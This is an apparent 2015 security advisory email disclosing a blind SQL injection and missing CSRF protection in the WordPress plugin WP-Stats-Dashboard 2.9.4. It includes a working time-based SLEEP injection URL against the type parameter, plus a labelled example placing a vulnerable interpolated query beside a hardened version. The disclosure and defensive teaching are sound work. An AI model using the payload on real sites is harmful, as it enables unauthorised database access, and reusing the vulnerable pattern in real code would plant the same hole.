Subject: SQL injection in WP-Stats-Dashboard 2.9.4
Date: Tue, 25 Aug 2015 11:32:44 +0200

Hello,

Plugin: WP-Stats-Dashboard 2.9.4 https://wordpress.org/plugins/wp-stats-dashboard/

1. Blind SQL injection

Authenticated administrators can execute arbitrary SQL commands through the type parameter. The endpoint also has no CSRF protection, so the request can be forged on an administrator's behalf.

Method: GET
URL: http://localhost/wp-content/plugins/wp-stats-dashboard/view/admin/graph_trend.php?type=1[sqli]
Vulnerable parameters: type

Example PHP callstack:
/wp-stats-dashboard/view/admin/graph_trend.php:36
WPSDTrendsDao::getStats   [/wp-stats-dashboard/classes/dao/WPSDTrendsDao.php:134]
wpdb::get_results

Verification:
http://localhost/wp-content/plugins/wp-stats-dashboard/view/admin/graph_trend.php?type=1%20or%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)%20--%20-
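Added example, not code from WP-Stats-Dashboard: the assumed shape of the query behind the callstack above, next to a hardened version built on WordPress's own APIs. The function names, the nonce action and the table name are hypothetical; the query shape is inferred from the callstack, not from the plugin's source.

```php
<?php
// Added example, not code from WP-Stats-Dashboard. The query shape below is an
// assumption based on the advisory's callstack (graph_trend.php -> getStats ->
// wpdb::get_results); the table name and function names are hypothetical.

// Vulnerable pattern: the raw ?type= value is interpolated into the SQL, so
// whatever follows the number becomes part of the statement wpdb executes.
function wpsd_trend_stats_vulnerable() {
    global $wpdb;
    $table = $wpdb->prefix . 'wpsd_trends';          // hypothetical table
    $type  = $_GET['type'];
    $sql   = "SELECT * FROM {$table} WHERE type = {$type}";
    return $wpdb->get_results( $sql );
}

// Hardened version with three independent controls:
//  1. a capability check, so only administrators reach the query at all;
//  2. a nonce check, which closes the CSRF angle the advisory notes
//     (the link must be generated with wp_nonce_url( $url, 'wpsd_graph_trend' ));
//  3. an integer cast plus $wpdb->prepare(), so the value can never change the
//     statement even if the earlier checks are ever bypassed.
function wpsd_trend_stats_hardened() {
    global $wpdb;

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'wpsd_graph_trend' );       // dies on a missing or bad _wpnonce

    $table = $wpdb->prefix . 'wpsd_trends';          // hypothetical table
    $type  = isset( $_GET['type'] ) ? absint( $_GET['type'] ) : 0;

    // %d is an integer placeholder; the table name is not user input.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE type = %d",
        $type
    );
    return $wpdb->get_results( $sql );
}
```

The absint() cast alone already reduces the verification URL's value to 1, but prepare() is the control that still holds if the parameter is later changed to accept a string.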

--
Regards,
Marcin Probola,